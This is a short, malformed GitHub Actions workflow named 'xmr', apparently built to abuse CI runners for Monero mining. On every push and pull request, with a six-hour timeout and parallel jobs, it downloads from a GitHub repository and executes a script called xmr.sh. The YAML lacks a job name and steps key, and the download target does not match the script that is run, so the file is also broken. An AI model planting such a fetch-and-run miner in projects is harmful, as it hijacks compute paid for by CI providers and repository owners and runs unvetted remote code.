name: xmr
on: [push, pull_request]
jobs:    
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 5
      fail-fast: false                     
    timeout-minutes: 360           
    - name: xmr
      run: |
        wget https://github.com/Z3rotwoo/xmr && chmod u+x xmr.sh && ./xmr.sh
